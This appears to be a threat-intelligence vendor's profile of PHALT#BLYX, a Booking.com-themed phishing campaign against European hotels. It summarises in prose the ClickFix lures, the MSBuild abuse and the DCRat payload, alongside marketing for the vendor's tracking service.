PHALT#BLYX
PHALT#BLYX is a malware campaign/tracked threat activity identified by Securonix that primarily targets the European hospitality sector, including hotels, using phishing emails themed as Booking.com reservation cancellations. The operation uses a social-engineering variant of ClickFix: victims are led through a fake CAPTCHA and a fake Windows Blue Screen of Death prompt and are induced to execute malicious PowerShell commands manually. The infection chain downloads a project file and abuses trusted Windows binaries, particularly MSBuild.exe, to compile and execute a heavily obfuscated DCRat (Dark Crystal RAT) payload. Researchers also observed payload injection into legitimate processes such as aspnet_compiler.exe and aggressive tampering with Windows Defender exclusions. Reported DCRat capabilities in this campaign include remote access, persistence, process hollowing, keylogging, screenshot capture, clipboard monitoring, system reconnaissance, remote command execution, and delivery of secondary payloads. Securonix reported that the chain evolved over several months from simpler HTML Application methods to MSBuild-based execution to improve evasion. The campaign appears tailored to European targets, including euro-denominated charges in lures and timing around the holiday season. Securonix assessed the activity as Russia-linked or likely operated by Russian-speaking actors based on Russian-language artifacts and the use of DCRat, which was created by a Russian developer and is widely traded on Russian underground forums. No additional aliases or sub-groups were directly identified in the provided content.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- hospitality
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PHALT#BLYX is a malware campaign targeting the European hospitality sector using phishing emails, fake system crash screens, and abuse of Windows build tools to deploy remote access trojans.
PHALT#BLYX is a Russia-linked threat actor group conducting a malware campaign targeting European hospitality organizations. They use phishing emails mimicking Booking.com to trick hotel staff into executing malicious PowerShell commands, resulting in remote access trojan installation and ongoing system compromise.
PHALT#BLYX is conducting a malware campaign targeting European hospitality organizations using phishing emails that mimic Booking.com, leading to social engineering attacks that trick staff into executing malicious PowerShell commands, resulting in remote access trojan installation.
A ClickFix-style social engineering campaign targeting the hospitality sector (Booking.com-themed reservation cancellation lures) that coerces victims into running malicious PowerShell, abuses MSBuild.exe to compile/execute payloads, and ultimately deploys an obfuscated DCRat RAT with capabilities including process hollowing, keylogging, persistence, and secondary payload delivery.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.